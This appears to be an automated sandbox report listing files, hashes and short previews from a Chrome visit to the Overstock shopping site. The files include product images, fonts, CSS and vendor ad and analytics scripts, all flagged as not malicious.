                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:4EBA6FFB301AD3C9796EA4C71DE1C125
                                                                                                                                                          SHA1:30CBFC8B3C48EEA11A5958C82246938C6C507AE2
                                                                                                                                                          SHA-256:AC07EEFC55D2CFF9F95256E0DFB976798405FF6B244FD1FA171F6994161BF113
                                                                                                                                                          SHA-512:89ACF2CA4E6412250C3998AF3423338634D6328B30EC123461136BD04FD666CADC1D2071F1425B8E309842B1A15215986D3A9E1460EF039905E13F052499E79C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Annette-Cotton-Velvet-Bolster-Pillow_f18d3b27-dfbb-4c74-9e7a-ec8497aa0b0a.jpg?v=1717270922&width=320
                                                                                                                                                          Preview:RIFF....WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .....l...*@.@.>9..D"!..k.@ ...._:Pi........^B|...J.U.&9.4.z+.i....}O.O.zb......%..c....|.~......T3.....cl6.m..a..m.....k........G."..A.U)...a...2.n.:_$K.....i..t.!_i..I...}...`;.Ob.....+...]o.......G.....*.wy6..,......@..Lm{.Jl.& ...U.<...]RRL.7....P..~...fP..#..........}....g`1<...p#............~...W.bO)..C...^......7...m.M.j...]\.'.......|..ua6|..c.)t@....sT&x.r/..g....Io..{..K..L.LO..:...12.*.#.F<.@j..n.....B~,......W..*.;x.TK.....Q.+.T.t..*.w,...,...3.=7.k.X...[.X...t...$.Q.I...!..*...~...CX.$.zi*...E..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (8100), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8100
                                                                                                                                                          Entropy (8bit):5.6559583377551
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F3D20A38469D981B1BFE768AE42A6907
                                                                                                                                                          SHA1:C83AE702C2B6DEA6FEF3A62B78315FB01C028BBA
                                                                                                                                                          SHA-256:60BBAE2C8C831EDB5EE3019251D236B28ECAEC0597346B32EBF17999DF7DA6D9
                                                                                                                                                          SHA-512:AC5D72409AD1BFD2ED822D4844D8D120729B5EA31DDFE677691C3A26A393EA8DAF2A01B7B9520243C801D70032124E12C972261437A56FA3CF9FE03C83A98815
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://td.doubleclick.net/td/rul/11435964337?random=1729272255005&cv=11&fst=1729272255005&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v9172781734z89176705627za201zb9176705627&gcd=13l3l3l3l1l1&dma=0&tag_exp=101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.overstock.com%2F&ref=https%3A%2F%2Feos.atebasyno.com%2F&top=https%3A%2F%2Fwww.overstock.com&hn=www.googleadservices.com&frm=2&tiba=Explore%20the%20New%20Overstock&npa=0&pscdl=noapi&auid=1714882903.1729272252&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dhomepage
                                                                                                                                                          Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":15552000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s1714882903.1729272252","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s1714882903.1729272252\u0026ig_key=1sNHMxNzE0ODgyOTAzLjE3MjkyNzIyNTI!2sZ__nwQ!3sAAptDV7K1nmR","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1sWZ6l-g!2sZ__nwQ!3sAAptDV7K1nmR"],"userBiddingSignals":[["8605163949","8526177074","8605218413","8604357350","8605117709","8604994774","8605118546","8605899945","8604992644"],null,1729272257143547],"
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):46351
                                                                                                                                                          Entropy (8bit):7.965743303316759
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:09D976D5BA592D07B28F7C996C9779E0
                                                                                                                                                          SHA1:E9165275536462E8B099F862FC695D7246D5DE04
                                                                                                                                                          SHA-256:1945292B318722D4640AEC434C931D9A344D451FD1B412F21F862F3D911E54FA
                                                                                                                                                          SHA-512:77E815045A42DE75E10366B6F4BEF1AEC55231483D560C22CDD9CEF8740868F7D78889276F0201FA259DC888441D02FF2C99879E893DEF40EB9CCBD7FB9B038F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Olsen-Textured-Round-Pouf_5567b870-b48d-4231-8a15-b2410fe4ca5a.jpg?v=1717129135&width=320
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................z..P..K2C2&....8.....E...C.........jbdv.;C[.;6V.....BA1.x"!..dHx.d.c..&/....2....2.A5..x...uR1...s...'.@G...Z..Jc]......A.A.!..I
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):147
                                                                                                                                                          Entropy (8bit):4.683859014830159
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:E970F523D7D61C4E1D901A03EF70B47F
                                                                                                                                                          SHA1:5453F85BE076A4015FF25993E5D218CEDB856A65
                                                                                                                                                          SHA-256:21833954A9DA74D7FEDE5F54E1635E4CCB86AA282AEB7873C010EF45A0B9A69A
                                                                                                                                                          SHA-512:E2CE225E5F80B709CE10DA06CB361F3AE1E7E281FD0CF1F9BFED8CD153FFDE4C3AE2059E1A05AFEC62F191C838E4AC8D6A5339CE8D43C609166B9C284EA54FAA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/40451764/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"40451764","rollup":{"average_rating":4.63,"rating_count":274,"review_count":274,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (617)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):559447
                                                                                                                                                          Entropy (8bit):5.6838609237395215
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:99210E7C2195DE81C0EEDF98787A69B3
                                                                                                                                                          SHA1:7B26C66058385B60109AA6129C2161A399A6034D
                                                                                                                                                          SHA-256:5F75BFBFBF0C7CAC2C87D6CA5DE0661AEDC188B0900B6CEF5EFBAEA134B53302
                                                                                                                                                          SHA-512:C3198D7943B3311679D77BCFFEA75D7043801277BF03AC10CA20BBE424E9AE896C060C7E0EF4143E23C2A41E367917A258404FBA428099316705B7252AEA8A6B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var E=function(){return[function(K,v,L,Q,d,x,r,w,f){return(K-(((K&55)==((w=[2,6,"P"],(K&60)==K)&&(L=LO.get(),f=a[27](33,v,L)),K)&&c.call(this,v),(K|w[0])>=29)&&(K<<1&8)<w[1]&&(r=a[0](72,v,L),Q.I=d||0,Q.u=Q.I,Q[w[2]]=r.UA,Q.Z=r.buffer,Q.H=x!==void 0?Q.I+x:Q.Z.length),w[0])&16)<8&&(K-3&15)>=10&&(N[w[1]](63,"INPUT")||(C[w[0]](w[0],this.u,this.V(),"click",this.N),this.vL=null),this.xV=!1,V[20](12,"INPUT",this)),f},function(K,v,L,Q,d){return(K|((Q=[9,895,11],(K-6&7)>=3)&&K>>2<Q[2]&&CO.call(this,Q[1],14),.Q[0]))&2||(L="",L=h[5](37,v.Cr,"imageselect")?L+'Select each image that contains the object described in the text or
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):37726
                                                                                                                                                          Entropy (8bit):7.984271004507909
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:CE3F12FE1CFD16A4F4B997513329D9D8
                                                                                                                                                          SHA1:73428438191D78A280147DCDD77CF0FBD61A5C0E
                                                                                                                                                          SHA-256:D172F3025850A16492DEDCB61440E3D149C61E98F22810B8C24A63AFE457EC55
                                                                                                                                                          SHA-512:CACA5AA3EFD43ED998BF7742366DC237DBF7E80D974243EC4FF889627CA18E79729791DFDFEB9E60C1520E9DBC78424A192DD89F34399923CE7050C9F26C0722
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/10102024-MOPS-645x187_DSK_Rug.jpg?v=1728487084&width=800
                                                                                                                                                          Preview:RIFFV...WEBPVP8X....(.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....o...* ...>9..C"!..*%. ....GEO..._<E..W.../......%.u..=.zG._.m..,T..y\s................./.ot?.....A.....k.g._..........W..._.w..........}...G.w................O.O.........{..D...k.c...o...O...?........{...W......m.............(........t.+.G....~.U............O...../......_........'..................[....._.G..]...#....?...........`?......K.................o.?v.......o.W...?.....~....5.......?......{..?y....A6..9....s.....2O.......l%......e.w.S=....=.ZM`...A..`....u~....)QS.=.....!4.v...U...P.?
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (40455)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):40532
                                                                                                                                                          Entropy (8bit):5.39831659265177
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D57FA8D12FCB57E7DA82519D6EF0F2B5
                                                                                                                                                          SHA1:9A966866655E2C061F52D33D7498DE975114F948
                                                                                                                                                          SHA-256:8A328317E49399C202F9AC73B9D8694B9A6B126CDB283C6A3105D0F168B47050
                                                                                                                                                          SHA-512:CB4781FD73E2327A763A5CBE34DC99F3E281A150F41227A1D93F2DBE5010F5DDCEC9AC0E55E2AD6237640C086CAF03B56FA399883DBBD67205A62EE54278EADA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */(()=>{var t,e,r,n,o={58332:(t,e,r)=>{"use strict";r.d(e,{m:()=>f});var n=r(47408),o=r.n(n),i="[[PowerreviewsGlobalObject]]";function a(t){return window[i][t]}function s(t,e){try{o()(window[i],t,{configurable:!1,enumerable:!1,writable:!1,value:e})}catch(t){0}}window.hasOwnProperty(i)||o()(window,i,{configurable:!1,enumerable:!1,writable:!1,value:{}});var c="@@init",u="stable(10461)";var f={getItem:a,setItem:s,setItemVolatile:function(t,e){window[i][t]=e},initialize:function(){s("version","4.1"),s("buildVersion","10461"),s(c,u)},get isInitialized(){return a(c)===u}}},6224:(t,e,r)=>{r(66803);var n=r(10988).Object,o=t.exports=function(t,e,r){return n.defineProperty(t,e,r)};n.defineProperty.sham&&(o.sham=!0)},88600:(t,e,r)=>{r(4148),r(37708),r(99220),r(64728),r(94196),r(27660),r(31632),r(86088);var n=r(10988);t.exports=n.Promise},89648:(t,e,r)=>{var n=r(71980),o=r(61052),i=TypeError;t.exports=function(t){if(n(t))
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1489)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):210833
                                                                                                                                                          Entropy (8bit):5.494126945983759
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D86EC6E8CF19DC7EE57DDC71ED1A5ADF
                                                                                                                                                          SHA1:730A172232C5B0A83D733B2B7FD0440BA3FB206A
                                                                                                                                                          SHA-256:A5C41349086521A1E7D8861AF57F8F2F83921A76B45EE33894CFC16B6C279F6F
                                                                                                                                                          SHA-512:0DEB15ADA2CFAB8C81BED1995D485FD70C0583DA74B8642110777726FE837D642CB28EA1E067ADA80A08B88820183FDE01C2556C2C7FB1B5E1663E72C188C5A3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:/*.* Braze Web SDK v5.1.1.* (c) Braze, Inc. 2024 - http://braze.com.* License available at https://github.com/braze-inc/braze-web-sdk/blob/master/LICENSE.* Compiled on 2024-02-13.*/.(function(){(function(b,a){if("function"===typeof define&&define.amd)define([],a);else if("object"===typeof module&&module.exports){var e = a();module.exports=e;module.exports.default=e}else if(b.braze){var d=a(),c;for(c in d)b.braze[c]=d[c]}else b.braze=a()})("undefined"!==typeof self?self:this,function(){var brazeInterface={};var n;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}function r(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if("number"==typeof a.length)return{next:aa(a)};throw Error(String(a)+" is not an iterable or ArrayLike");}function ca(a){if(!(a instanceof Array)){a=r(a);for(var b,c=[];!(b=a.next()).done;)c.push(b.value);a=c}return a}.var da="function"==typeof Object.create?Object.create:function(
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):30112
                                                                                                                                                          Entropy (8bit):7.979584842617259
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:FEA0639C1A450AB88DA1E9CC7D2DC54C
                                                                                                                                                          SHA1:200E8F65DCE8994DB781E7B9B077D16907B09D59
                                                                                                                                                          SHA-256:0AA68E9761812CAFC129AE4840CDDB11B006A3959B031CA73497EA2273310289
                                                                                                                                                          SHA-512:C2EA6DB0F220BF5CFDE24C8A18BE49B853E5E11A10E27D95F995B3F190D91960189A89E4317BB33A3F08E25AD3A1D8C000C4BD4B40B02B8E7548C9B6753C39ED
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/10102024-MOPS-645x187_DSK_LivingRoom.jpg?v=1728487084&width=800
                                                                                                                                                          Preview:RIFF.u..WEBPVP8X....(.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .s..0....* ...>9..C.!.#&...`..b/e...........>2P.M......{.e?M~G.g..O./.NA.._}...3...O..|_..g...ur...................?.........[./...'...._.^..x}F.C...W._..O.?.?..........K._................m.g.K....................W.O............7.....O....@....?.z.z_.........w..:.....o.v..Z...~.1...K...g.O.|G.....w......~........K.....#...?..........^....q.a.....w..._.....s....._.}....e.......g................o.....?......s.G.....>......;....u..9.k..O.;.r.g.k6.|...I...J.>..J.iSK.......D%..C......._...K..`........fF.cGB
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7534
                                                                                                                                                          Entropy (8bit):7.853942032618851
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:E481DAAFC8BF67BD07968555506E4BB3
                                                                                                                                                          SHA1:DA7825E969E88A73A5E5985A965309FB8F23F98D
                                                                                                                                                          SHA-256:AA6ACFCB73704B67A0234451ED1341A009225A4DFA74FDF98883DBC05E00BF57
                                                                                                                                                          SHA-512:D13C33012611ABA41303F948D87D6873C931C958D9260C62B2485A9BEEF60E5B3C940367F8A2CB5607D4F6C8E23718C0226A29E33C3AD26C50121328B9D64CE3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Madison-Park-Egyptian-Cotton-Solid-Blanket_5d95d49e-1714-4b5a-ad63-8f67f5ff441b.jpg?v=1717238692&width=320
                                                                                                                                                          Preview:RIFFf...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .....d...*@.@.>9..D.!...| ....~?N.}vy[4...Ul.;...m.).s......_.?`=e...Uz..L.....#...wRvX-"..x%...y......z.:..^\.\>...?...pBzw.7.oX..?o<......7.............s.....D-.s.....D-.s.....D-.s.....D-.s.e..t.........IxT....`.......^t.x...Q_.7).=".FS..Y...3..z\..__.|..}@.3vj.....Ru..f]...z#....2<?...5az$..j..t.//.........y:!n.{......%....uX..5...7?i...`.......;J.....Xn}?...'e.Yr.......'.U.R.........W3$.M...........c...j...y....^J...m+...O.f._..?~.Z"O....w...]t...B....:..A..`...K BJ....46f...E...R.yW. .(a......,%...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (61316)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):61482
                                                                                                                                                          Entropy (8bit):5.508192731840952
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:297EC6B8F4EC778EDEE46BAFFA0B8105
                                                                                                                                                          SHA1:3F80EEFA93C92EE3CA1BEF4B434507D896DA856A
                                                                                                                                                          SHA-256:B1B3CAACDF30C01CE1418FD3EA540F99BAFCB015D5AFD7DE9FE6789A96437428
                                                                                                                                                          SHA-512:E6C85ED2AFB4BB10E107923384B559629DCBEBE1AFE95203F0A13C1FD6EEB53069F52E417711C03DCF52530017BD1492990D644CAFD631F0D801A194492FF885
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:(()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var r=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),n=r.match(/ (\(.+\)$)/);r=n?r.replace(n[0],""):r;var i=this.extractL
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2125)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2242
                                                                                                                                                          Entropy (8bit):4.88654166349037
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:66DB7FF8E3B8800E48F0A481DEE4686C
                                                                                                                                                          SHA1:0F66289044C1081BAE7AFB48DAA40310936740B9
                                                                                                                                                          SHA-256:D3FD030EA84CD40F5A5B88F24FE9DFBF45F7A0AA86414C47DE65A9D59ACB5F59
                                                                                                                                                          SHA-512:9599780CA98F380A5049EF704B47905AC057DAE519657F39A5D3486AB423BC04E56C983C106DEE15492C71898AC5F5B95675205F7123341289A70970B21E7518
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/component-reference-pricing.css?v=160032368790096176431729142870
                                                                                                                                                          Preview:.reference-pricing-wrapper{font-size:14px;position:relative;color:#252525}.reference-pricing-wrapper .msrp-label{border-bottom:1px dashed;cursor:pointer}.reference-pricing-wrapper .sale-percent{color:#d50d25}.reference-pricing-wrapper .tooltip-label{position:relative;z-index:10}.reference-pricing-wrapper .tooltip-label s{border-bottom:1px dashed;cursor:pointer}.reference-pricing-wrapper .tooltip-label .msrp-label+span s{border-bottom:0;cursor:default}.msrp-percent{color:#5a5a5a}.card--product .reference-pricing-wrapper .tooltip-label.display-MSRP s{border-bottom:1px dashed;cursor:pointer}.card--product .reference-pricing-wrapper .tooltip-label.display-MSRP .msrp-label{display:none}.price .product-label{margin-top:5px}.reference-pricing-wrapper .pricing-tooltip{position:absolute;display:none;top:-5px;left:0;transform:translateY(-100%);background-color:#dadcdf;font-size:12px;color:#5a5a5a;border-radius:5px;width:max-content;padding:.85rem 1rem;max-width:20rem;white-space:normal;line-heig
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 18784, version 1.0
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18784
                                                                                                                                                          Entropy (8bit):7.989090922563851
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:48BDBD2FDBA819C4761D8EAF7948FFCE
                                                                                                                                                          SHA1:39BEE04BD277A9C4E94E2FD42D53F4E3C0AFB8A5
                                                                                                                                                          SHA-256:9C5529D40C44A9FC7A7325D3DB1EF37B56C0A210D0C4EE3CEF18E76CDAF73D79
                                                                                                                                                          SHA-512:4500BE82316C9C8AA77F4383ECF3F9F4B1E3FD3135C9E40F2BB962DE6E4E03B81CCA369C3C56CD254B72A979D396B2EB1AD33A1ECF1F1EA229DEC68FAEA94A0B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://fonts.shopifycdn.com/helvetica/helvetica_n7.39bee04bd277a9c4e94e2fd42d53f4e3c0afb8a5.woff2?h1=b3ZlcnN0b2NrLmNvbQ&hmac=0ad0d9e984f55d3b3cf495404c27f2ef344f0ad902ebd3503e8c03f2ff98c3e8
                                                                                                                                                          Preview:wOF2......I`.......,..I..........................`..`..x..b..4.....8..{.6.$.....L.. .,. ..t."...6.(...J..a$B.8.@.s......\2....T..$\.b..........p.6..JL/2.L.....-o...5T..m9.#..q.g...#..3TY....D.....Ui...0......V......a+[...F...(X.#.._....(..........'...y~...1..#I...V.N\......[cDK,.Z.c..hV....!H9"..(u(........G.........?...{..g..%[.8Zb{.>v...zw....`EP..IuW....t.....~.....M.~of...'.."$...`Z:$1...|..>`...../.;...=.0.HA.w\....T.............O._3..F<...-..JL......0Y.B......UW...]..C..(w`.%.C.....%aw....K......../.Ls........>l........R.xN........M..KRyX.#%z.....H.....?.&i.!Yf..1._..UiYI.Y../.u..[....&.M.DyS:.&.`B:m.=..........&..^...Jb..It..D...l...lo.Bxk.82L..|..1....x.:H..@..+..X.......L...\M+......%.6i/.K...-.W0..g5/$0...D......m..?...m..:.....!E......S{S.I...f....w.1...|R+.%........x.)d.II.,>i....,@YP..h..@......o .).,....J.5@(K.x.Y..r......L...!.9x...+...=....IT.."..@./.P-0.p=.>.....bD.1i}B..f..L....d./..da..M0..@....].Oa.d(..y=+p".&...V.n.Gu.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (11086), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11089
                                                                                                                                                          Entropy (8bit):5.707517032317645
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0A8B2868C057BCB6201643FDC8083A9F
                                                                                                                                                          SHA1:2D3A2FA7323BEA6FAB291B82DD02D8D740201BAC
                                                                                                                                                          SHA-256:8144B93FB0876C8A028A8D0448D032D3919570E6FF2E9617A2D3BAADF528FC77
                                                                                                                                                          SHA-512:41BBC551F3949E356FCDF82386474701423DB9E8AFB05C0E3C30DC6E3E09E01E9EE2439FFE47A83ED5A84ED9D1F8837392A235D8796006A9CE7479EC379386B2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:./* */try { eval('(function() {var qss="&cb="+Math.floor(99999999999*Math.random());try{qss+="&ref="+encodeURIComponent(document.referrer)}catch(e){}try{qss+="&sc_r="+encodeURIComponent(screen.width+"x"+screen.height)}catch(e){}try{qss+="&sc_d="+encodeURIComponent(screen.colorDepth.toString())}catch(e){}var callDis=function(e,t,n,o){function c(){callDisInternal(e,t,n,o)}"complete"===document.readyState?setTimeout(c):window.addEventListener?window.addEventListener("load",c,!1):window.attachEvent("onload",c)},disCalled=!1,callDisInternal=function(e,t,n,o){disCalled||(disCalled=!0,n=(n?"https:":"")+"//"+t+"/dis/dis.aspx",(t=document.createElement("iframe")).width=t.height="0",t.style.display="none",t.setAttribute("sandbox","allow-same-origin allow-scripts"),t.setAttribute("aria-hidden","true"),t.title="Criteo DIS iframe",void 0!==o&&""!==o&&(document.body.appendChild(t),null!=t.contentDocument)?(t.contentDocument.open(),t.contentDocument.write(o),t.contentDocument.close()):(t.src=(n+
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):37627
                                                                                                                                                          Entropy (8bit):7.9638482942344675
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D38FAC2FFBA1FD89109F716F5DBCA636
                                                                                                                                                          SHA1:908FDF6450619256DB9B64A276F570E51CEBF75D
                                                                                                                                                          SHA-256:F53327036459E6D597F58F633D76910D9D41A97AF7AB3263ACBBCF168D028EE8
                                                                                                                                                          SHA-512:44FBC6CEAE611DC9EC9D215B8BFCC09DADD86C1CEF8178BA87A0A29DBEB6BFD0D45CDFDA72F348A0099C85E99005C830F5C03D1181462AD4D5BE7C17B3BEE977
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
